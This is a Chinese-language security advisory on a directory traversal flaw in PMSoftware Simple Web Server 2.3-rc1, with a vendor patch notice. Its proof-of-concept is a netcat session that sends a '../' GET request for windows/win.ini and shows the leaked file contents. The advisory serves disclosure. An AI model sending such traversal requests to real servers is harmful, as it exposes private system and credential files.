PMSoftware Simple Web Server目录遍历漏洞

发布日期:2013-01-02
更新日期:2013-01-08

受影响系统:
PMSoftware PMSoftware Simple Web Server 2.3-rc1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57143
 
PMSoftware Simple Web Server是HTTP服务器应用。
 
Simple Web Server 2.3-rc1之前版本及其他版本没有正确过滤用户的输入,通过包含 (/../) 序列的特制URL请求,可允许远程攻击者遍历系统上的所有目录。
 
<*来源:CwG GeNiuS (cwggenius@gmail.com)
 
  链接:
       
       
       
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: Simple Webserver 2.3-rc1 Directory Traversal
 # Date: 01/02/2013
 # Exploit Author: CwG GeNiuS
 # Vendor Homepage:
 # Software Link:
 # Version: 2.3-rc1 (and earlier)
 # Tested on: Windows 7 Enterprise SP1
 #
 #Vulnerability: When removing the preceding "/" from a GET
 #          request the webserver allows directory
#          traversal.
 #
 #Fix: I have spoken with the developer who has now
 #  released 2.3-rc2 to correct the vulnerability

root@bt:~# nc -v 192.168.1.132 80
 192.168.1.132: inverse host lookup failed: Unknown server error : Connection timed out
 (UNKNOWN) [192.168.1.132] 80 (www) open
 GET ../../../../../../../../windows/win.ini http/1.1

HTTP/1.1 400 Bad Request
 Server: PMSoftware-SWS/2.3
 Date: Wed, 02 Jan 2013 22:45:2 GMT
 Connection: close

HTTP/1.1 200 Ok
 Server: PMSoftware-SWS/2.3
 Date: Wed, 02 Jan 2013 22:45:2 GMT
 Accept-Ranges: bytes
 Content-type:
 Content-Length: 403

; for 16-bit app support
 [fonts]
 [extensions]
 [mci extensions]
 [files]
 [Mail]
 MAPI=1
 [MCI Extensions.BAK]
 3g2=MPEGVideo
 3gp=MPEGVideo
 3gp2=MPEGVideo
 3gpp=MPEGVideo
 aac=MPEGVideo
 adt=MPEGVideo
 adts=MPEGVideo
 m2t=MPEGVideo
 m2ts=MPEGVideo
 m2v=MPEGVideo
 m4a=MPEGVideo
 m4v=MPEGVideo
 mod=MPEGVideo
 mov=MPEGVideo
 mp4=MPEGVideo
 mp4v=MPEGVideo
 mts=MPEGVideo
 ts=MPEGVideo
 tts=MPEGVideo
 


GET ../../../../../../../../windows/win.ini http/1.1

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
PMSoftware
 ----------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
?id=1

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygysg.html